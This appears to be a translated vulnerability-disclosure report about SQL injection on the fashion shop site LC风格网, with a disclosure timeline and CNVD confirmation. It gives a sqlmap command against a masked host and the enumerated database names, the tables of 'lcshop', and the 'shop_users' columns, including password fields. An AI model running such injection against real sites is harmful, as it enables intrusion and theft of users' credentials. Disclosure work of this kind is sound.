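2015-09-08: Details reported to the vendor; awaiting vendor handling
2015-09-10: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying agency
2015-09-20: Details disclosed to core white hats and experts in related fields
2015-09-30: Details disclosed to regular white hats
2015-10-10: Details disclosed to trainee white hats
2015-10-25: Details disclosed to the public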
LC风格网 SQL injection vulnerability
Injection:
sqlmap.py -u "http://**.**.**.**/women?subCate=tops" --dbs
Partial data
available databases [10]:
[*] ctmake
[*] ecshop
[*] information_schema
[*] lcshop
[*] mysql
[*] test
[*] test_snatch
[*] test_wordpress
[*] wordpress2
[*] wordpress_online

Database: lcshop
[40 tables]
+-------------------------------+
| auth                          |
| auth_roles                    |
| auth_user                     |
| frag                          |
| frag_category                 |
| shop                          |
| shop_blog                     |
| shop_goods                    |
| shop_goods_count              |
| shop_goods_imgs               |
| shop_goods_info               |
| shop_goods_sku                |
| shop_goods_sku_attributes     |
| shop_lib_attributes           |
| shop_lib_attributes_settings  |
| shop_lib_brands               |
| shop_lib_categories           |
| shop_lib_coupon               |
| shop_lib_coupon_batch         |
| shop_lib_discount_relation    |
| shop_lib_express              |
| shop_lib_logs                 |
| shop_lib_promotion            |
| shop_lib_promotion_type       |
| shop_lib_region               |
| shop_lib_tags                 |
| shop_orders                   |
| shop_orders_goods             |
| shop_orders_package           |
| shop_orders_returned          |
| shop_orders_settings          |
| shop_orders_settlement        |
| shop_orders_settlement_detail |
| shop_settings                 |
| shop_tags_goods               |
| shop_users                    |
| shop_users_cart               |
| shop_users_delivery           |
| shop_users_settings           |
| weixin_menu                   |
+-------------------------------+

Database: lcshop
Table: shop_users
[15 columns]
+-------------+------------------------------+
| Column      | Type                         |
+-------------+------------------------------+
| identity    | enum('NONE','BRAND','STAFF') |
| level       | enum('USER','ADMIN')         |
| avatar      | varchar(255)                 |
| birthday    | int(10)                      |
| create_time | int(10)                      |
| email       | varchar(255)                 |
| gender      | enum('male','female')        |
| id          | bigint(20) unsigned          |
| intro       | varchar(500)                 |
| location    | varchar(255)                 |
| name_in_url | varchar(100)                 |
| nick_name   | varchar(100)                 |
| password    | varchar(120)                 |
| real_name   | varchar(100)                 |
| status      | enum('NORMAL','LOCK','BAD')  |
+-------------+------------------------------+
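Too messy, couldn't be bothered to look any further...
In summary
You know what to do
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-09-10 19:19
CNVD has confirmed the vulnerability as described; no direct handling channel with the site's operator has been established yet, and the report is awaiting claim.
None yet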